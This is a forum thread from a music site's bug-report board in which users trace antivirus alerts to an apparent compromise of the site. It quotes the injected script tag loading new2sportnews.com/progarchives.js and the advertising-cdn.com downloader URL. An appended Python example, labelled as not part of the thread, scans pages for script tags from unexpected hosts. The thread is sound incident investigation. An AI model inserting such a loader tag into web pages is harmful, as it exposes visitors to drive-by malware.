
Download denied

Printed From: Progarchives.com
Category: Site News, Newbies, Help and Improvements
Forum Name: Report bugs here
Forum Description: Help us improve the site from a tech standpoint
URL: http://www.progarchives.com/forum/forum_posts.asp?TID=129492
Printed Date: May 06 2024 at 12:09
Software Version: Web Wiz Forums 11.01 - http://www.webwizforums.com


Topic: Download denied
Posted By: I prophesy disaster
Subject: Download denied
Date Posted: August 07 2022 at 15:20
My security software is reporting "Download denied" every time I click on a link in PA Forums (but not PA Home). Further details on the report:
 
Event: Download denied
User: ******
User type: Active user
Application name: msedge.exe
Application path: C:\Program Files (x86)\Microsoft\Edge\Application
Component: Web Anti-Virus
Result description: Blocked
Type: Probability of unauthorized software download
Name: https://advertising-cdn.com/qPyGTw?return=js.client&&se_referrer=http://www.progarchives.com/&default_keyword=Progressive Rock Music Forum&landing_url=www.progarchives.com/forum/&name=_DGLzgLZ8nXkPCBxT&host=https://advertising-cdn.com/qPyGTw
Threat level: High
Object type: Web page
Object name: qPyGTw
Object path: https://advertising-cdn.com/qPyGTw?return=js.client&&se_referrer=http://www.progarchives.com/&default_keyword=Progressive Rock Music Forum&landing_url=www.progarchives.com/forum/&name=_DGLzgLZ8nXkPCBxT&host=https://advertising-cdn.com
Reason: Cloud Protection



-------------
No, I know how to behave in the restaurant now, I don't tear at the meat with my hands. If I've become a man of the world somehow, that's not necessarily to say I'm a worldly man.



Replies:
Posted By: I prophesy disaster
Date Posted: September 17 2022 at 15:19
It looks like this problem has finally been fixed (although more testing is needed to be sure).



-------------
No, I know how to behave in the restaurant now, I don't tear at the meat with my hands. If I've become a man of the world somehow, that's not necessarily to say I'm a worldly man.


Posted By: I prophesy disaster
Date Posted: September 23 2022 at 10:04
The problem has returned. [thumbs down]

-------------
No, I know how to behave in the restaurant now, I don't tear at the meat with my hands. If I've become a man of the world somehow, that's not necessarily to say I'm a worldly man.


Posted By: Cristi
Date Posted: September 23 2022 at 10:08
I've never seen such a thing happen. [confused]
Download denied? What download?

Microsoft Edge is not a good browser IMO, even Google Chrome has gotten worse.
Try Mozilla Firefox (although it collapsed for me once a few years back) and a new(er) browser called Brave.



Posted By: I prophesy disaster
Date Posted: September 23 2022 at 10:26
Originally posted by Cristi:

I've never seen such a thing happen. [confused]
Download denied? What download?

That's the notification I get. I have no idea to what "download" is referring. I assume it's something that the https://advertising-cdn.com website is trying to download onto my computer.

Originally posted by Cristi:

Microsoft Edge is not a good browser IMO, even Google Chrome has gotten worse.
Try Mozilla Firefox (although it collapsed for me once a few years back) and a new(er) browser called Brave.

I have four browsers on my computer, but I mostly use only two of them: Edge and Chrome. I use Edge for sites that keep me logged on, such as this site, and Chrome for things I'd rather clear my browser history, cookies, etc. I have Firefox but I don't like it.
 



-------------
No, I know how to behave in the restaurant now, I don't tear at the meat with my hands. If I've become a man of the world somehow, that's not necessarily to say I'm a worldly man.


Posted By: Cristi
Date Posted: September 23 2022 at 10:33
^ It does not seem to be PA's fault for what's going on there. I think your browser is stuck on some weird ads, trackers and the like.


Posted By: I prophesy disaster
Date Posted: September 23 2022 at 10:47
^ This is the only site where it happens. And there was another topic started by wiz_d_kidd reporting something similar: Intrusion Detected from PA (http://www.progarchives.com/forum/forum_posts.asp?TID=129510). That topic referred to the same website, but I think the difference might be due to different security software. It is the security software that is producing the notifications.
 



-------------
No, I know how to behave in the restaurant now, I don't tear at the meat with my hands. If I've become a man of the world somehow, that's not necessarily to say I'm a worldly man.


Posted By: Cristi
Date Posted: September 23 2022 at 10:50
Originally posted by I prophesy disaster:

^ This is the only site where it happens. And there was another topic started by wiz_d_kidd reporting something similar: Intrusion Detected from PA (http://www.progarchives.com/forum/forum_posts.asp?TID=129510). That topic referred to the same website, but I think the difference might be due to different security software. It is the security software that is producing the notifications.
 

I had some problems a few months ago, but it was my antivirus that didn't let me see any album pages because of "phishing". I solved the problem but it took me a little while. 


Posted By: I prophesy disaster
Date Posted: September 23 2022 at 11:08
^ This problem is only occurring on the forum pages, not on the database pages. But it does occur every time I click on any link in the forum.
 
How did you solve your problem (if it isn't too involved to say)?
 



-------------
No, I know how to behave in the restaurant now, I don't tear at the meat with my hands. If I've become a man of the world somehow, that's not necessarily to say I'm a worldly man.


Posted By: Cristi
Date Posted: September 23 2022 at 11:12
Originally posted by I prophesy disaster:

^ This problem is only occurring on the forum pages, not on the database pages. But it does occur every time I click on any link in the forum.
 
How did you solve your problem (if it isn't too involved to say)?
 

I played with the antivirus settings, trial and error. I got it right in the end. 
I don't use Google Chrome for PA anymore.


Posted By: I prophesy disaster
Date Posted: September 23 2022 at 11:25
Originally posted by I prophesy disaster:

not on the database pages

Actually, it does occur when I click on any of the "PROG SUB-GENRES" links.
 



-------------
No, I know how to behave in the restaurant now, I don't tear at the meat with my hands. If I've become a man of the world somehow, that's not necessarily to say I'm a worldly man.


Posted By: I prophesy disaster
Date Posted: September 23 2022 at 11:32
^And the "PROG ROCK GUIDES" and "FAQ" links.
 



-------------
No, I know how to behave in the restaurant now, I don't tear at the meat with my hands. If I've become a man of the world somehow, that's not necessarily to say I'm a worldly man.


Posted By: I prophesy disaster
Date Posted: September 23 2022 at 15:44
I just discovered something quite interesting: I have a VPN which I sometimes use and sometimes don't use, depending on what I'm doing. When I'm not using the VPN, I don't get the "Download denied" notification. But when I do use the VPN (server in Los Angeles), I get the notifications. I haven't yet tried the VPN server in other available locations, so I don't know if the problem is with the VPN or the location.
 



-------------
No, I know how to behave in the restaurant now, I don't tear at the meat with my hands. If I've become a man of the world somehow, that's not necessarily to say I'm a worldly man.


Posted By: I prophesy disaster
Date Posted: September 23 2022 at 15:52
^ VPN server in London –> "Download denied" notification.
VPN server in Sydney –> "Download denied" notification.
 
So, it appears that the problem is with the VPN.
 



-------------
No, I know how to behave in the restaurant now, I don't tear at the meat with my hands. If I've become a man of the world somehow, that's not necessarily to say I'm a worldly man.


Posted By: I prophesy disaster
Date Posted: September 24 2022 at 04:01
I should remark that it was only yesterday's "Download denied" notifications that were caused by the VPN. The original problem that lasted more than a month was not caused by the VPN. I don't use the VPN to visit this site and it was quite by accident without realising that it was still on that it was in use while I was visiting this site yesterday.
 



-------------
No, I know how to behave in the restaurant now, I don't tear at the meat with my hands. If I've become a man of the world somehow, that's not necessarily to say I'm a worldly man.


Posted By: wiz_d_kidd
Date Posted: October 04 2022 at 10:49
It seems that many users, myself included, have had similar issues. I've spent considerable time digging into the source of the problem. The upshot is that ProgArchives appears to have been hacked!

Back in August, I began getting warnings from Norton Antivirus about a malicious activity (i.e. intrusion detections) when I visit the "Forums", or "Prog Rock Guides" pages. But it doesn't happen on the "About Us" page, or the main page.

The problem is that the HTML code for the Forums and Guides pages (and probably others) contains malicious javascript that looks like this:

    <script src="https://new2sportnews.com/progarchives.js" type="d597b4f971c3864a4c6a613f-text/javascript"></script>

The referenced site, new2sportnews.com, has the appearance of the Nigerian version of The Guardian website. However, it is a bogus web site. It was created in Jan 2021 and had no content until Jun 2022, and the content (according to the internet's Wayback Machine) has not changed since then.

The javascript that is stored at that site (i.e. https://new2sportnews.com/progarchives.js) and is being executed unconditionally by Progarchives, is highly obfuscated to hide its function. I ran it through an "unobfuscator" and confirmed that the script redirects the user to a site called "advertising-cdn.com" which attempts to download a file to the user's computer. The nature of the file is unknown. It could be password stealing, keystroke interception, or other nefarious functions.

I also checked Progarchives using the Wayback Machine and determined that it was clean as of July 19th. Sometime after that is when the system was hacked. Users, myself included, began experiencing problems around Aug 7th.

After an update to my Norton Antivirus, it started completely blocking my access to the forums because I couldn't stop it from executing the malicious javascript. I could disable javascript entirely, but then I could not post or vote in polls. My solution was to install the NoScript add-on to Firefox, and disable scripts specifically for new2sportnews.com. That seems to have worked, at least for now.

The target site, advertising-cdn.com, which contains the downloader script, appeared to be a valid site at first, but now it is gone. The hackers could be working on a different attack.

I've contacted PA admins through every means possible. Thanks to Ian (aka Nogbad the Bad) for forwarding private messages that I sent him on Progressive Ears. I also contacted the site owners/admins thru GoDaddy, but so far no one has responded.

I hope that our site admins fix this infection before its users are seriously attacked. There is no valid reason that the HTML code for this site should be executing a javascript on a bogus website!

To check for yourself, look at the page source HTML (in Firefox right-click anywhere on a page and select "View Page Source"), then search for new2sportnews.com. If you find it, you've confirmed that the site has been hacked and can potentially cause serious harm to its users (if it hasn't already).



-------------
“I don’t like country music, but I don’t mean to denigrate those who do. And for those who like country music, denigrate means to ‘put down.'” – Bob Newhart


Posted By: chopper
Date Posted: October 05 2022 at 06:50
Wow, that is worrying, thanks for doing this.

Do you know the name of the file that it attempts to download? My anti-virus is not picking anything up but, as you say, this could be a serious problem. It's a shame M@x no longer does anything with PA.


Posted By: chopper
Date Posted: October 05 2022 at 07:14
Edge developer tools are throwing up an error on that web page. I'm not an expert on this, but that suggests to me that the script is not being executed; however, that would be the case if the web site is no longer there. It does leave PA open to future attacks, I would guess.




Posted By: wiz_d_kidd
Date Posted: October 05 2022 at 10:12
The website https://new2sportnews.com, and the script (progarchives.js) are still there, but that script invokes another script (of unknown name) at https://advertising-cdn.com which is now offline. I agree with you that they can relaunch a future attack with ease now that they have the "hooks" built into PA.

This all smacks of a Reflected Cross-Site Scripting (XSS) attack, which is explained here: https://portswigger.net/web-security/cross-site-scripting




-------------
“I don’t like country music, but I don’t mean to denigrate those who do. And for those who like country music, denigrate means to ‘put down.'” – Bob Newhart


Posted By: chopper
Date Posted: October 05 2022 at 11:21
Presumably this is a fairly simple code change to remove references to that script from the code? Can you tell which pages are impacted?


Posted By: wiz_d_kidd
Date Posted: October 06 2022 at 06:42
I'm not sure how this website works, but the root infection might actually be in the code that generates and updates the pages your browser receives. Removing the bad script from the output pages might not fix the problem, if it gets added again the next time the page refreshes.

So far, this is the status of the pages I'm aware of:

Main - not infected
Forums - infected
Prog Rock Guides - infected
Log In - not infected
Prog Radios - not infected
Prog Links - not infected
FAQ - infected
About Us - not infected

The bad script occurs multiple times on some of these pages, not just once.


-------------
“I don’t like country music, but I don’t mean to denigrate those who do. And for those who like country music, denigrate means to ‘put down.'” – Bob Newhart
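
The page-source check described in the two posts above (search each page for a script loaded from a host the site does not own, and note how many times it appears), as an added example that is not part of the original thread. The allowlist, the sample pages and their local script paths are constructed for illustration; only the new2sportnews.com tag is taken from the thread.

```python
from collections import Counter
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Assumption: the only host this site expects to serve its scripts.
ALLOWED_HOSTS = {"www.progarchives.com"}

class ScriptHosts(HTMLParser):
    """Count the host behind every <script src=...> on one page."""
    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.hosts = Counter()

    def handle_starttag(self, tag, attrs):
        src = dict(attrs).get("src")
        if tag != "script" or not src:
            return  # not a script, or an inline script with no remote origin
        # The type attribute is deliberately ignored: the injected tag quoted
        # in the thread has a prefixed, non-standard type value.
        host = urlparse(urljoin(self.page_url, src.strip())).hostname
        self.hosts[host or "(unparseable)"] += 1

def unexpected_script_hosts(page_url, html, allowed=ALLOWED_HOSTS):
    """Return {host: occurrences} for script sources outside the allowlist."""
    parser = ScriptHosts(page_url)
    parser.feed(html)
    parser.close()
    return {h: n for h, n in parser.hosts.items() if h not in allowed}

# Constructed sample pages; only the new2sportnews.com tag is from the thread.
INJECTED = ('<script src="https://new2sportnews.com/progarchives.js" '
            'type="d597b4f971c3864a4c6a613f-text/javascript"></script>')
PAGES = {
    "http://www.progarchives.com/forum/":
        '<html><head><script src="includes/default.js"></script>' + INJECTED +
        '</head><body><p>Forum index</p>' + INJECTED + '</body></html>',
    "http://www.progarchives.com/about.asp":
        '<html><head><script src="/js/site.js"></script></head>'
        '<body>About Us</body></html>',
}

if __name__ == "__main__":
    for url, html in PAGES.items():
        found = unexpected_script_hosts(url, html)
        print(url, "->", found if found else "no unexpected script hosts")
```

Relative and scheme-relative `src` values are resolved against the page URL before the host comparison, so the site's own scripts are not reported.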


Posted By: wiz_d_kidd
Date Posted: October 06 2022 at 10:08
Apparently PA uses Web Wiz Forums software, version 11.01 (released 10 Sep 2014). The latest version is 12.05 (released 18 Jan 2022). I did a search for Web Wiz vulnerabilities, and found that many versions, beginning with v6.34 and extending thru v10.03, were identified as having vulnerability to cross-site scripting (XSS) attacks. That's a lot of versions for which they never fixed the problem, and it still might be present in v11.01.

https://www.cvedetails.com/cve/CVE-2006-0175/
https://www.exploit-db.com/exploits/28589
https://vulmon.com/searchpage?q=web+wiz+forum
https://www.nmmapper.com/st/exploitdetails/37678/36689/web-wiz-forums-multiple-cross-site-scripting-vulnerabilitiesdownload/



-------------
“I don’t like country music, but I don’t mean to denigrate those who do. And for those who like country music, denigrate means to ‘put down.'” – Bob Newhart


Posted By: chopper
Date Posted: October 06 2022 at 12:13
PA is well behind in its version of the forum software but I don't suppose it's going to get upgraded any time soon since M@x seems to have abandoned it. I'm thinking PA is dying a slow death now, at some point the forum software will stop working (it's probably out of support now).


Posted By: Nogbad_The_Bad
Date Posted: October 06 2022 at 12:29
That's what I'm watching.

-------------
Ian

Host of the Post-Avant Jazzcore Happy Hour on Progrock.com

https://podcasts.progrock.com/post-avant-jazzcore-happy-hour/


